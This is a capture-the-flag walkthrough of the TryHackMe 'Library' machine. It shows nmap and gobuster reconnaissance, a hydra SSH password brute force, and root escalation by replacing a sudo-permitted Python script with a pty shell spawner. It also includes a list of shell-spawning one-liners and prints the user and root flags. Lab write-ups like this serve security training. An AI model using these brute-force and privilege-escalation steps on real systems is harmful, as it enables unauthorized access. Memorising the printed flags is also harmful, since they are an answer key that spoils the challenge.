Library Walkthrough — Tryhackme
Dear friends, let us solve challenges in the Library box present in the below link.
1.Start the VPN you have downloaded and Deploy the Tryhackeme machine first. Ping and check the We need to run a Nmap scan against the machine to know which ports are open and which services are operational on these ports. I am going to use a hostile Nmap scan. 1. We get to see 22, 80, 139, 445 ports are open.
nmap -sS -sV -A -O 10.10.64.71
2. Running the gobuster to check hidden folders and directories.
gobuster dir -u http://10.10.64.71/ -w /usr/share/wordlists/dirb/common.txt
3. Checking the results generated by gobuster. http://10.10.64.71/robots.txt, giving the below results. It may be a hint to use rockyou.txt
4. When tried to look for the information using the provided IP 10.10.64.71 as the URL in the browser, We found the writer of the blog as shown below
5. Assuming the user is meliodas, try brute-force for the user meliodas using the hydra tool. In the gobuster search, we got robots.txt, which gave a hint to use rockyou. We will be using the dictionary “rockyou.txt” to brute force the login of meliodas
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.64.71
6. We got the login as meliodas and password as iloveyou1 from the brute force search. Let’s try to log into the target machine with these credentials.
ssh meliodas@10.10.64.71
Now we are inside the meliodas’s SSH shell. Let’s capture the user flag. With ls command, we can see a list of files present. We got access to the user and can see two files. Now, We got the first flag of this machine!!
7. Now, to capture the root flag, we need root access. First and foremost, let see which the user can perform sudo command. The user only can use sudo python on the bak.py file. Checking the permissions of bak.py.Let’s check the content inside the bak.py.
sudo -l
8.I guess we can’t do anything with the script because it is write-protected. Since we only gain sudo privilege on executing the bak.py using python. How about delete the exiting bak.py and create a new one.
cp bak.py bak.py.org
rm /home/meliodas/bak.py
9. Let us create a new file at allows us to spawn a root shell. Let us use GTFO bins for spawning shells. Let us try in below that is suitable.
During pen tests, you may often obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Some of this will depend on the system environment and installed packages.
Shell Spawning
python -c ‘import pty; pty.spawn(“/bin/sh”)’
echo os.system(‘/bin/bash’)
/bin/sh -i
perl — e ‘exec “/bin/sh”;’
perl: exec “/bin/sh”;
ruby: exec “/bin/sh”
lua: os.execute(‘/bin/sh’)
- (From within IRB)
exec “/bin/sh”
- (From within vi)
:!bash
- (From within vi)
:set shell=/bin/bash:shell
- (From within nmap)
!sh
Many of these will also allow you to escape jail shells. The top 3 would be my most successful in general for spawning from the command line.
We used the first script to spawn, imported the script to the newly created bak.py file, and ran it using sudo command for root access.
echo ‘import pty; pty.spawn(“/bin/sh”)’ > bak.py
sudo python /home/meliodas/bak.py
id
whoami
10. Eureka! We got the root access. We can now capture the root flag. Now, let us find the root flag in its directory.
ls
cd /root
ls
Done!!!!!! Let us see the answers to the challenge questions now.
- User flag
6d488cbb3f111d135722c33cb635f4ec
2. Root flag
e8c8c6c256c35515d1d344ee0488c617
Thank you very much for reading. I hope you find this is useful, and if there is something you would like to add or any suggestions, you can contact me anytime.
Happy Hacking!
